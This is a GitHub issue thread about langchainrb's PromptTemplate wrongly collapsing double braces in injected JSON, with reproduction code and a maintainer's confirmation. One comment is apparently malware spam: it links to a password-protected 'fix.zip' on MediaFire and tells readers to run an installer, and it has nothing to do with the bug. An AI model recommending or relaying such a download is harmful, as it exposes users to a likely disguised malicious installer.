### ISSUE TITLE
Insertion of JSON when formatting a template

### ISSUE THREAD

**Issue by rvmtz** [patterns-ai-core/langchainrb#745]
**Describe the bug**
When using `Langchain::Prompt::PromptTemplate` to inject a JSON document where the sequence of characters `{{` or `}}` happens, it turns them into a single bracket `{` and `}`.

**To Reproduce**
Steps to reproduce the behavior.

```ruby
data = '{"nested":{"foo":"bar"}}'
prompt = Langchain::Prompt::PromptTemplate.new(template: '{data}', input_variables: ['data'])
prompt.format(data: data)

=> "{\"nested\":{\"foo\":\"bar\"}"
```

**Expected behavior**
To inject the JSON accordingly. 

```ruby
=> "{\"nested\":{\"foo\":\"bar\"}}"
```

**Additional context**

This behavior was introduced in commit https://github.com/patterns-ai-core/langchainrb/commit/63ed16509c866e04792930c8b677f2ed2a256379.

By reading the context of the pull request (https://github.com/patterns-ai-core/langchainrb/pull/43),
I understand that support for escaping JSON was added with double braces `{{ }}`.

But I found out that this doesn't support all cases:

```ruby
prompt = Langchain::Prompt::PromptTemplate.new(template: '{{data}}', input_variables: [])
prompt.format(data: '{"root":{"nested":{"foo":"bar"}}}')
=> "{\"root\":{\"nested\":{\"foo\":\"bar\"}}"
```

As a reference, Python rejects this with a syntax error:

```python
>>> f'data: {{"nested": {"foo": "bar"}}}'
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
ValueError: Invalid format specifier
```

`f-strings` in Python works as expected:

```python
>>> data
'{"nested":{"foo":"bar"}}'
>>> f'{data}'
'{"nested":{"foo":"bar"}}'
```

Should we enhance PromptTemplate to process JSON as-is, or add an option to escape these sequences?
I’m available to discuss and submit a PR if needed. Looking forward to your guidance!

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by andreibondarev** [comment]
@rvmtz Thank you for identifying the bug. Sounds like there's a bug. This code:
```ruby
data = '{"nested":{"foo":"bar"}}'
prompt = Langchain::Prompt::PromptTemplate.new(template: '{data}', input_variables: ['data'])
prompt.format(data: data)
```
should produce:
```
=> "{\"nested\":{\"foo\":\"bar\"}}"
```

Feel free to open up a fix if you have any ideas on solving it.

**Comment by rvmtz** [comment]
@andreibondarev , sorry for the late reply.
I've just open a PR trying to address the issue. Let me know your thoughts: https://github.com/patterns-ai-core/langchainrb/pull/751.
Have a great weekend!
